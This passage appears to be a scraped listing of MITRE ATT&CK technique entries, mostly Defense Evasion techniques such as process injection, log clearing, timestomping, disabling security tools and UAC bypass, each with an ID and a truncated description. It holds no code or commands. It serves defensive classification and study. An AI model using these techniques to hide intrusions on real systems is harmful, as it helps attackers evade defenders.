Defense EvasionThread Execution Hijacking
Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a …
T1055.004
Defense EvasionAsynchronous Procedure Call
Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate …
T1055.005
Defense EvasionThread Local Storage
Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. …
T1055.008
Defense EvasionPtrace System Calls
Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. …
T1055.009
Defense EvasionProc Memory
Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory …
T1055.011
Defense EvasionExtra Window Memory Injection
Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM …
T1055.012
Defense EvasionProcess Hollowing
Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code …
T1055.013
Defense EvasionProcess Doppelgänging
Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is …
T1055.014
Defense EvasionVDSO Hijacking
Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared …
T1055.015
Defense EvasionListPlanting
Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting …
T1064
Defense EvasionScripting
**This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.** Adversaries may use scripts to aid in operations and perform multiple actions …
T1066
Defense EvasionIndicator Removal from Tools
If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the …
T1070
Defense EvasionIndicator Removal
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an …
T1070.001
Defense EvasionClear Windows Event Logs
Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. …
T1070.002
Defense EvasionClear Linux or Mac System Logs
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. …
T1070.003
Defense EvasionClear Command History
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. …
T1070.004
Defense EvasionFile Deletion
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system …
T1070.005
Defense EvasionNetwork Share Connection Removal
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin …
T1070.006
Defense EvasionTimestomp
Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a …
T1070.007
Defense EvasionClear Network Connection History and Configurations
Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various …
T1070.008
Defense EvasionClear Mailbox Data
Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete …
T1070.009
Defense EvasionClear Persistence
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such …
T1070.010
Defense EvasionRelocate Malware
Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid …
T1073
Defense EvasionDLL Side-Loading
Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in …
T1078
Defense EvasionValid Accounts
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may …
T1078.001
Defense EvasionDefault Accounts
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts …
T1078.002
Defense EvasionDomain Accounts
Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential …
T1078.003
Defense EvasionLocal Accounts
Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts …
T1078.004
Defense EvasionCloud Accounts
Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those …
T1085
Defense EvasionRundll32
The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid …
T1088
Defense EvasionBypass User Account Control
Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. …
T1089
Defense EvasionDisabling Security Tools
Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event …
T1093
Defense EvasionProcess Hollowing
Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process …
T1096
Defense EvasionNTFS File Attributes
Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: …
T1099
Defense EvasionTimestomp
Adversaries may take actions to hide the deployment of new, or modification of existing files to obfuscate their activities. Timestomping is a technique that modifies …
T1107
Defense EvasionFile Deletion
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system …
T1108
Defense EvasionRedundant Access
**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.** Adversaries may use more than one remote access …
T1109
Defense EvasionComponent Firmware
Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and …
T1112
Defense EvasionModify Registry
Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution. Access to …
T1116
Defense EvasionCode Signing
Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: …
T1117
Defense EvasionRegsvr32
Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can …
T1118
Defense EvasionInstallUtil
InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) …
T1121
Defense EvasionRegsvcs/Regasm
Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: …
T1122
Defense EvasionComponent Object Model Hijacking
The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) …
T1126
Defense EvasionNetwork Share Connection Removal
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin …
T1127
Defense EvasionTrusted Developer Utilities Proxy Execution
Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that …
T1127.001
Defense EvasionMSBuild
Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by …
T1127.002
Defense EvasionClickOnce
Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a …
T1127.003
Defense EvasionJamPlus
Adversaries may use `JamPlus` to proxy the execution of a malicious script. `JamPlus` is a build utility tool for code and data build systems. It …
T1130
Defense EvasionInstall Root Certificate
Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application …
T1134
Defense EvasionAccess Token Manipulation
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access …
T1134.001
Defense EvasionToken Impersonation/Theft
Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token …
T1134.002
Defense EvasionCreate Process with Token
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and …
T1134.003
Defense EvasionMake and Impersonate Token
Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password …
T1134.004
Defense EvasionParent PID Spoofing
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned …
T1134.005
Defense EvasionSID-History Injection
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user …
T1140
Defense EvasionDeobfuscate/Decode Files or Information
Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that …
T1143
Defense EvasionHidden Window
Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when …
T1144
Defense EvasionGatekeeper Bypass
In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called <code>com.apple.quarantine</code>. …
T1146
Defense EvasionClear Command History
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. …
T1147
Defense EvasionHidden Users
Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is …
T1148
Defense EvasionHISTCONTROL
The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs …
T1149
Defense EvasionLC_MAIN Hijacking
**This technique has been deprecated and should no longer be used.** As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that …
T1150
Defense EvasionPlist Modification
Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded …
T1151
Defense EvasionSpace after Filename
Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app …
T1152
Defense EvasionLaunchctl
Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports …
T1158
Defense EvasionHidden Files and Directories
To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t …
T1170
Defense EvasionMshta
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension <code>.hta</code>. (Citation: Wikipedia HTML Application) HTAs are standalone applications …
T1181
Defense EvasionExtra Window Memory Injection
Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are …
T1186
Defense EvasionProcess Doppelgänging
Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables …
T1191
Defense EvasionCMSTP
The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe …
T1196
Defense EvasionControl Panel Items
Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel …
T1197
Defense EvasionBITS Jobs
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file …
T1198
Defense EvasionSIP and Trust Provider Hijacking
In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to …
T1202
Defense EvasionIndirect Command Execution
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be …
T1205
Defense EvasionTraffic Signaling
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use …
T1205.001
Defense EvasionPort Knocking
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series …
T1205.002
Defense EvasionSocket Filters
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can …
T1207
Defense EvasionRogue Domain Controller
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). …
T1211
Defense EvasionExploitation for Defense Evasion
Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming …
T1216
Defense EvasionSystem Script Proxy Execution
Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from …
T1216.001
Defense EvasionPubPrn
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain …
T1216.002
Defense EvasionSyncAppvPublishingServer
Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application …
T1218
Defense EvasionSystem Binary Proxy Execution
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are …
T1218.001
Defense EvasionCompiled HTML File
Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM …
T1218.002
Defense EvasionControl Panel
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are …
T1218.003
Defense EvasionCMSTP
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection …
T1218.004
Defense EvasionInstallUtil
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation …
T1218.005
Defense EvasionMshta
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of …
T1218.007
Defense EvasionMsiexec
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with …
T1218.008
Defense EvasionOdbcconf
Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers …
T1218.009
Defense EvasionRegsvcs/Regasm
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are …
T1218.010
Defense EvasionRegsvr32
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, …
T1218.011
Defense EvasionRundll32
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may …
T1218.012
Defense EvasionVerclsid
Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each …
T1218.013
Defense EvasionMavinject
Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into …
T1218.014
Defense EvasionMMC
Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and …
T1218.015
Defense EvasionElectron Applications
Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft …
T1220
Defense EvasionXSL Script Processing
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to …
T1221
Defense EvasionTemplate Injection
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) …
T1222
Defense EvasionFile and Directory Permissions Modification
Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 …
T1222.001
Defense EvasionWindows File and Directory Permissions Modification
Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 …
T1222.002
Defense EvasionLinux and Mac File and Directory Permissions Modification
Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 …
T1223
Defense EvasionCompiled HTML File
Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as …
T1480
Defense EvasionExecution Guardrails
Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on …
T1480.001
Defense EvasionEnvironmental Keying
Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography …
T1480.002
Defense EvasionMutual Exclusion
Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize …
T1484
Defense EvasionDomain or Tenant Policy Modification
Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide …
T1484.001
Defense EvasionGroup Policy Modification
Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on …
T1484.002
Defense EvasionTrust Modification
Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants …
T1497
Defense EvasionVirtualization/Sandbox Evasion
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for …
T1497.001
Defense EvasionSystem Checks
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks …
T1497.002
Defense EvasionUser Activity Based Checks
Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of …
T1497.003
Defense EvasionTime Based Checks
Adversaries may employ various time-based methods to detect virtualization and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of …
T1500
Defense EvasionCompile After Delivery
Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), …
T1502
Defense EvasionParent PID Spoofing
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned …
T1506
Defense EvasionWeb Session Cookie
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already …
T1527
Defense EvasionApplication Access Token
Adversaries may use application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are …
T1535
Defense EvasionUnused/Unsupported Cloud Regions
Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage …
T1536
Defense EvasionRevert Cloud Instance
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of …
T1542
Defense EvasionPre-OS Boot
Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various …
T1542.004
Defense EvasionROMMONkit
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is …
T1542.005
Defense EvasionTFTP Boot
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly …
T1548.006
Defense EvasionTCC Manipulation
Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & …
T1550
Defense EvasionUse Alternate Authentication Material
Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and …
T1550.001
Defense EvasionApplication Access Token
Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens …
T1550.002
Defense EvasionPass the Hash
Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is …
T1550.003
Defense EvasionPass the Ticket
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is …
T1550.004
Defense EvasionWeb Session Cookie
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already …
T1553
Defense EvasionSubvert Trust Controls
Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may …
T1553.001
Defense EvasionGatekeeper Bypass
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act …
T1553.002
Defense EvasionCode Signing
Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary …
T1553.003
Defense EvasionSIP and Trust Provider Hijacking
Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user …
T1553.004
Defense EvasionInstall Root Certificate
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in …
T1553.005
Defense EvasionMark-of-the-Web Bypass
Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a …
T1553.006
Defense EvasionCode Signing Policy Modification
Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from …
T1562
Defense EvasionImpair Defenses
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such …
T1562.001
Defense EvasionDisable or Modify Tools
Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security …
T1562.002
Defense EvasionDisable Windows Event Logging
Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity …
T1562.003
Defense EvasionImpair Command History Logging
Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type …
T1562.004
Defense EvasionDisable or Modify System Firewall
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as …
T1562.006
Defense EvasionIndicator Blocking
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin …
T1562.007
Defense EvasionDisable or Modify Cloud Firewall
Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from …
T1562.008
Defense EvasionDisable or Modify Cloud Logs
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments …
T1562.009
Defense EvasionSafe Mode Boot
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and …
T1562.010
Defense EvasionDowngrade Attack
Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically …
T1562.011
Defense EvasionSpoof Security Alerting
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information …
T1562.012
Defense EvasionDisable or Modify Linux Audit System
Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track …
T1562.013
Defense EvasionDisable or Modify Network Device Firewall
Adversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage. Modifying or …
T1564
Defense EvasionHide Artifacts
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important …
T1564.001
Defense EvasionHidden Files and Directories
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, …
T1564.002
Defense EvasionHidden Users
Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are …
T1564.003
Defense EvasionHidden Window
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when …
T1564.004
Defense EvasionNTFS File Attributes
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains …
T1564.005
Defense EvasionHidden File System
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access …
T1564.006
Defense EvasionRun Virtual Instance
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation …
T1564.007
Defense EvasionVBA Stomping
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye …
T1564.008
Defense EvasionEmail Hiding Rules
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various …
T1564.009
Defense EvasionResource Forking
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured …
T1564.010
Defense EvasionProcess Argument Spoofing
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data …
T1564.011
Defense EvasionIgnore Process Interrupts
Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process …
T1564.012
Defense EvasionFile/Path Exclusions
Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive …
T1564.013
Defense EvasionBind Mounts
Adversaries may abuse bind mounts on file structures to hide their activity and artifacts from native utilities. A bind mount maps a directory or file …
T1564.014
Defense EvasionExtended Attributes
Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide their malicious data in order to evade detection. Extended attributes are key-value pairs …
T1578
Defense EvasionModify Cloud Compute Infrastructure
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the …
T1578.001
Defense EvasionCreate Snapshot
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing …
T1578.002
Defense EvasionCreate Cloud Instance
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new …
T1578.003
Defense EvasionDelete Cloud Instance
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. …
T1578.004
Defense EvasionRevert Cloud Instance
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of …
T1578.005
Defense EvasionModify Cloud Compute Configurations
Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may …
T1599
Defense EvasionNetwork Boundary Bridging
Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to …
T1599.001
Defense EvasionNetwork Address Translation Traversal
Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass …
T1600
Defense EvasionWeaken Encryption
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution) Encryption …
T1600.001
Defense EvasionReduce Key Space
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful …
T1600.002
Defense EvasionDisable Crypto Hardware
Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved …
T1601
Defense EvasionModify System Image
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the …
T1601.001
Defense EvasionPatch System Image
Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) …
T1601.002
Defense EvasionDowngrade System Image
Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often …
T1610
Defense EvasionDeploy Container
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute …
T1612
Defense EvasionBuild Image on Host
Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. …
T1620
Defense EvasionReflective Code Loading
Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly …
T1622
Defense EvasionDebugger Evasion
Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware …
T1647
Defense EvasionPlist File Modification
Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist …
T1656
Defense EvasionImpersonation
Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, …
T1666
Defense EvasionModify Cloud Resource Hierarchy
Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses. IaaS environments often group resources into a hierarchy, enabling …
T1672
Defense EvasionEmail Spoofing
Adversaries may fake, or spoof, a sender’s identity by modifying the value of relevant email headers in order to establish contact with victims under false …
T1678
Defense EvasionDelay Execution
Adversaries may employ various time-based methods to evade detection and analysis. These techniques often exploit system clocks, delays, or timing mechanisms to obscure malicious activity, …
T1679
Defense EvasionSelective Exclusion
Adversaries may intentionally exclude certain files, folders, directories, file types, or system components from encryption or tampering during a ransomware or malicious payload execution. Some …
T1007
DiscoverySystem Service Discovery
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands …
T1010
DiscoveryApplication Window Discovery
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) …
T1012
DiscoveryQuery Registry
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software. The Registry contains a significant amount of information …
T1016
DiscoverySystem Network Configuration Discovery
Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery …
T1016.001
DiscoveryInternet Connection Discovery
